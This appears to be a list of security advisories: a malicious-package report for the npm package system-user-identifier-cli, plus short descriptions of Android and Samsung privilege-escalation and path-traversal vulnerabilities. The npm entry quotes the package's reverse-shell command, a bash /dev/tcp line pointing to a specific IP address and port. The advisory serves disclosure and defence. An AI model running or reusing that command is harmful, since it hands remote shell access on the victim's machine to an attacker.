MAL-2026-4679 Malicious code in system-user-identifier-cli (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4da2798716abd83143a0a2e2b3e5064e2f2a1ac0a63633a70c42881330f52be8 index.js line 13 executes bash -c "bash -i & /dev/tcp/101.43.232.7/7777 0&1" via childprocess.exec, opening an interactive reverse shell to the...

CVE-2024-49737

In applyTaskFragmentOperation of WindowOrganizerController.java, there is a possible way to launch arbitrary activities as the system UID due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not need...

CVE-2023-21456

Path traversal vulnerability in Galaxy Themes Service prior to SMR Mar-2023 Release 1 allows attacker to access arbitrary file with system uid...

Samsung SMR 路径遍历漏洞

Samsung SMR is a system patch package from Samsung South Korea. It provides patches for Samsung mobile applications. A path traversal vulnerability exists in versions prior to Samsung SMR Oct-2021 Release 1, which stems from a path traversal vulnerability in FactoryAirCommnadManger, which allows ...